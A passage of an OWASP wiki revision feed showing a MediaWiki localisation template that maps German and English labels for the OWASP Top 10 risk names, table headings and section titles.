        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232189</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232189"/>
				<updated>2017-08-11T19:10:55Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==This page is outdated. It is part of the Top 10-2017 RC1 which has been rejected.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==If you wish to comment, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. Changes to this page will be lost!==&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;==More information available [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2017_Release_Candidate_1 here]].&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
